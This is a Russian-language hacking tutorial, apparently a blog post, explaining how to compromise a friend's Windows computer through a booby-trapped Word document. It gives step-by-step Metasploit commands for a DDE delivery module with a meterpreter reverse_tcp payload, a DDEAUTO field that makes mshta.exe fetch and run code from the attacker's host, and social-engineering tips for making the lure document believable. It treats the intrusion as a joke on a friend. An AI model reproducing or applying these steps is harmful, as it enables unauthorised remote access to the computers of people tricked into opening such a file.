Взлом твоего друга через MS Office

Любите своих друзей и не заставляйте их скучать

Привет, Анон. Сегодня я хочу показать тебе, как можно получить доступ через файл MS Office. Это очень простая атака, так как можно придумать много предлогов для отправки документов.

Теория

DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл)

Установка

Необходимые составляющие для проведения атаки:

1. Устройство с Kali Linux.
2. Устройство с Windows.
3. Microsoft Office (Word).

Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды:

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Далее добавим эту утилиту в папку с эксплоитами Metasploit:

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

После этого можно переходить в msfconsole. Запускаем и производим обновления всех наших путей:

msfconsole
reload_all

После этого можно переходить к генерации нашей полезной нагрузки. Для этого необходимо пошагово выполнять такие команды:

use exploit/windows/dde_delivery

Далее нам необходимо установить свой сервис чтобы принимать соединение, для этого нужно указать команду со своим IP адресом:

set SRVHOST 192.168.177.141
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST 192.168.177.141 
set LPORT 6708 exploit
exploit

Подготавливаем документ MS Office

После этого получаем ссылку, которую нужно вмонтировать в документ MS Office. Для этого переходим в раздел "Вставить"->"Быстрые элементы"->"Поле" (Можно использовать быструю комбинацию CTRL + F9).

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.1.6:8080/wi9o8uanVgkjv”}

После открытия документа откроется сессия. После открытия будут два всплывающих окна. Но они без каких либо запретов, просто уведомления о наличии сторонних связей с другими приложениями.

Заключение

Вот таким способом можно получить доступ к компьютеру. Дальше смотрите в сторону пост эксплуатации. Там есть очень много чего интересного. Любите своих друзей и не заставляйте их скучать. Можно пошутить вот таким простым, но эффективным способом. Также формулы можно использовать и в других программах MS Office. Для более правдоподобного вида нужно наполнять документы тематическим содержанием.